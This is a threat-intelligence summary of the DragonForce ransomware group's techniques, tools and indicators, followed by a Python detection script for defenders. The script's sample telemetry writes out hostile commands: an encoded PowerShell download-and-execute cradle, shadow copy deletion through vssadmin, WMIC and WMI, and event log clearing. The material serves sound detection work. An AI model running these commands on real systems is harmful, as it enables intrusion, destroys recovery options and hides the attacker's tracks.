DragonForce is a ransomware operation that evolved from a pro-Palestine hacktivist group into a financially motivated Ransomware-as-a-Service (RaaS) program whose custom payloads are built on the Conti V3 codebase. It runs double extortion, relies on commodity post-exploitation tooling, and uses Bring Your Own Vulnerable Driver (BYOVD) techniques to neutralize endpoint security; AttackIQ has published attack graphs emulating its TTPs so organizations can validate their defenses. #DragonForce #Conti #SystemBC #Mimikatz #CobaltStrike
Keypoints
- DragonForce ransomware emerged in August 2023 and evolved from a politically motivated hacktivist group to a hybrid RaaS operation focused on financial extortion.
- In July 2024, DragonForce introduced a customized ransomware variant based on the Conti V3 codebase, with an affiliate program offering up to 80% ransom shares.
- The group employs a double extortion strategy by encrypting victim data and leaking sensitive information on their Dedicated Leak Site and RansomBay platforms.
- Operators use the BYOVD technique (loading vulnerable signed drivers such as Truesight.sys and RentDrv.sys) to terminate EDR/XDR processes and disable security controls, and clear Windows Event Logs after encryption to hinder detection and forensic analysis.
- DragonForce's toolkit includes SystemBC (backdoor), Mimikatz (credential theft), SoftPerfect Network Scanner (reconnaissance), and Cobalt Strike (command and control, lateral movement, and persistence).
- Initial infection often begins with encoded PowerShell commands deploying Cobalt Strike, followed by credential harvesting and network reconnaissance to enable domain-wide ransomware deployment.
- AttackIQ released attack graphs simulating DragonForce TTPs, enabling organizations to assess and improve detection, prevention, and response capabilities against this threat.
MITRE Techniques
- [T1059.001] Command and Scripting Interpreter: PowerShell - Encoded PowerShell commands executed to download and deploy Cobalt Strike Beacon ("encoded PowerShell script into base64 and then executed using PowerShell's -encodedCommand parameter").
- [T1543.003] Create or Modify System Process: Windows Service - Persistence via new Windows service creation using the SC utility ("creates a service through the SC Windows utility").
- [T1105] Ingress Tool Transfer - Downloading additional payloads into memory or to disk to advance operations ("downloads to memory and saves to disk in independent scenarios to test network and endpoint controls").
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - Establishing persistence by creating a registry Run key entry that executes on startup ("creates an entry under HKLM\Software\Microsoft\Windows\CurrentVersion\Run").
- [T1018] Remote System Discovery - Using AdFind to gather Active Directory information, including accounts and groups ("leverages the AdFind utility to discover details about the Active Directory configuration").
- [T1003] OS Credential Dumping - Using an obfuscated Mimikatz variant to extract credentials ("uses an obfuscated version of Mimikatz to dump passwords and hashes").
- [T1021.001] Remote Services: Remote Desktop Protocol - Moving laterally via RDP connections ("attempts to remotely connect to an accessible system via Remote Desktop Protocol").
- [T1106] Native API - Using the CreateProcessA API to spawn new processes ("executes the CreateProcessA Windows API call to create a new process").
- [T1082] System Information Discovery - Enumerating system information with the RtlGetVersion, NetWkstaGetInfo, and NtQuerySystemInformation APIs ("executes RtlGetVersion and NetWkstaGetInfo API calls to enumerate system information").
- [T1007] System Service Discovery - Collecting information on installed services using the EnumServiceStatus, QueryServiceStatusEx, and EnumDependentServices APIs ("executes the EnumServiceStatus Windows API to gather information").
- [T1490] Inhibit System Recovery - Deleting Volume Shadow Copies via WMI and WMIC to remove recovery options ("executes Get-WMIObject Win32_ShadowCopy and wmic.exe commands to delete shadow copies").
- [T1083] File and Directory Discovery - Enumerating the file system with the FindFirstFileW and FindNextFileW APIs to locate files for encryption ("calls FindFirstFileW and FindNextFileW for file system enumeration").
- [T1486] Data Encrypted for Impact - Encrypting files using ChaCha8 with RSA-1024 protecting the file keys ("encrypts the identified files using a combination of ChaCha8 and RSA-1024").
Indicators of Compromise
- [File Names] - Vulnerable drivers used for the BYOVD technique: Truesight.sys and RentDrv.sys, loaded to terminate EDR/XDR processes.
- [Tools] - Post-exploitation tools observed: SystemBC (aka Coroxy), Mimikatz, SoftPerfect Network Scanner, and Cobalt Strike, used for persistence, credential theft, reconnaissance, and lateral movement.
- [IOCs] - Command-line patterns indicative of malicious activity, e.g., encoded PowerShell scripts, "vssadmin Delete Shadows" commands, and WMIC invocations for Volume Shadow Copy deletion.
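The techniques and indicators above describe command-line artifacts that surface in process-creation telemetry: an -EncodedCommand blob carrying a download cradle, sc create for a service, a reg add under the Run key, vssadmin/WMIC/WMI shadow copy deletion, and event log clearing. The following is an added detection example, not code from the AttackIQ post or from DragonForce tooling. It decodes the base64/UTF-16LE payload so the cleartext can be inspected, then runs the remaining rules over both the raw command line and the decoded script. The sample events, host names, paths, service names and the 198.51.100.7 address are constructed; the wevtutil pattern is an assumption, since the page states that logs are cleared but does not name the utility.

```python
"""Added detection example: flag DragonForce-style command lines in process-creation telemetry.

Not code from the AttackIQ post or from DragonForce tooling; sample events, hosts, paths,
service names and the 198.51.100.7 (documentation range) address are constructed.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass
from typing import Optional


def encode_powershell(script: str) -> str:
    """Build the -EncodedCommand form: base64 over UTF-16LE (used here only to construct samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> Optional[str]:
    """Recover the script from an -EncodedCommand blob; None if it is not UTF-16LE base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# powershell.exe accepts abbreviated forms of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"(?i)[-/](?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]{16,})")
# Download-cradle keywords that only become visible once the encoded script is decoded.
CRADLE = re.compile(r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-Expression|\bIEX\b|"
                    r"FromBase64String|Invoke-WebRequest|\biwr\b")

# (rule name, ATT&CK ID, pattern). Run against the raw command line plus any decoded script.
RULES = [
    ("shadow_copy_delete", "T1490", re.compile(
        r"(?i)\bvssadmin(?:\.exe)?\s+delete\s+shadows|\bwmic(?:\.exe)?\s+shadowcopy\s+delete|"
        r"Win32_ShadowCopy\b.*?(?:\.Delete\(\)|Remove-WmiObject)")),
    ("service_create", "T1543.003", re.compile(r"(?i)\bsc(?:\.exe)?\s+create\s+\S+")),
    ("run_key_persistence", "T1547.001", re.compile(
        r"(?i)\breg(?:\.exe)?\s+add\s+\S*\\CurrentVersion\\Run(?:Once)?\b")),
    # Assumption: the page says logs are cleared but names no tool; wevtutil cl is the usual one.
    ("event_log_clear", "T1070.001", re.compile(r"(?i)\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b")),
]


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    technique: str
    evidence: str


def scan_event(event: dict) -> list[Finding]:
    """Return every rule hit for one process-creation record ({'host': ..., 'cmdline': ...})."""
    host, cmd = event["host"], event["cmdline"]
    findings: list[Finding] = []
    text = cmd
    m = ENCODED_FLAG.search(cmd)
    if m:
        decoded = decode_powershell(m.group(1))
        if decoded is not None:
            findings.append(Finding(host, "encoded_powershell", "T1059.001", decoded.strip()))
            if CRADLE.search(decoded):
                findings.append(Finding(host, "download_cradle", "T1105", decoded.strip()))
            text = f"{cmd} {decoded}"  # let the remaining rules see the cleartext as well
    for rule, technique, pattern in RULES:
        hit = pattern.search(text)
        if hit:
            findings.append(Finding(host, rule, technique, hit.group(0)))
    return findings


def scan_events(events: list[dict]) -> list[Finding]:
    return [f for e in events for f in scan_event(e)]


def hits_per_host(findings: list[Finding]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.host] = counts.get(f.host, 0) + 1
    return counts


# Constructed sample telemetry following the sequence in the summary: encoded PowerShell cradle,
# service and Run-key persistence, shadow copy deletion, log clearing, one benign row and one
# encoded-but-harmless row (flagged as encoded PowerShell, but with no cradle).
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": "powershell.exe -nop -w hidden -enc "
        + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b')")},
    {"host": "ws01", "cmdline": r'sc create UpdSvc binPath= "C:\ProgramData\upd.exe" start= auto'},
    {"host": "ws01", "cmdline": r"reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d C:\ProgramData\upd.exe"},
    {"host": "fs02", "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "fs02", "cmdline": "wmic.exe shadowcopy delete /nointeractive"},
    {"host": "fs02", "cmdline": 'powershell.exe -Command "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"'},
    {"host": "fs02", "cmdline": "wevtutil.exe cl Security"},
    {"host": "ws03", "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "ws03", "cmdline": "powershell.exe -enc " + encode_powershell(r"Get-ChildItem C:\Temp")},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.host:5} {f.technique:10} {f.rule:20} {f.evidence[:60]}")
```

Decoding before matching is the point of the first rule: a cradle hidden behind -enc never appears in the raw command line, so a detector that only regexes the visible arguments misses it. The other rules are intentionally narrow (they name the exact utilities cited on the page) and should be paired with parent-process context in production, since administrators also run vssadmin and sc.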
Read more: https://www.attackiq.com/2025/05/23/emulating-dragonforce-ransomware/